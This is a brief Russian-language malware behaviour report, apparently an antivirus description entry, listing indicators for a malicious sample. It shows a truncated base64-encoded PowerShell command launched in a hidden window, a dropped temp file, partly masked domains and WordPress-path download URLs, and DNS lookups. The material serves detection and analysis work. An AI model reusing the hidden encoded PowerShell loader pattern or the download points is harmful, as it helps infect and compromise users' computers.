Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQASwBkAHoAaABBAD0AWwBUAHkAcABFAF0AKAAiAHsAMwB9AHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAC4AZABpAFIAZQBDAFQATwByAFkAJwAsACcAbQAnACwAJwAuAGkATwAnACwAJwBzAHkAUwBUAEUAJw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1948
- %TEMP%\862326.cvr
- 'pa###icfe.com':80
- 'br#####toworkapp.com':80
- 'br#####toworkapp.com':443
- 'ru##rmi.com':80
- 'da###eel.com':443
- http://www.pa###icfe.com/shadow-health/nQ/
- http://br#####toworkapp.com/wp-content/c1/
- http://www.ru##rmi.com/wp-admin/jmb/
- 'br#####toworkapp.com':443
- 'da###eel.com':443
- DNS ASK se####ekifix.com
- DNS ASK pa###icfe.com
- DNS ASK br#####toworkapp.com
- DNS ASK ru##rmi.com
- DNS ASK ed#####eklamajansi.com
- DNS ASK da###eel.com
- DNS ASK da#####ckssolutions.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQASwBkAHoAaABBAD0AWwBUAHkAcABFAF0AKAAiAHsAMwB9AHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAC4AZABpAFIAZQBDAFQATwByAFkAJwAsACcAbQAnACwAJwAuAGkATwAnACwAJwBzAHkAUwBUAEUAJw...' (со скрытым окном)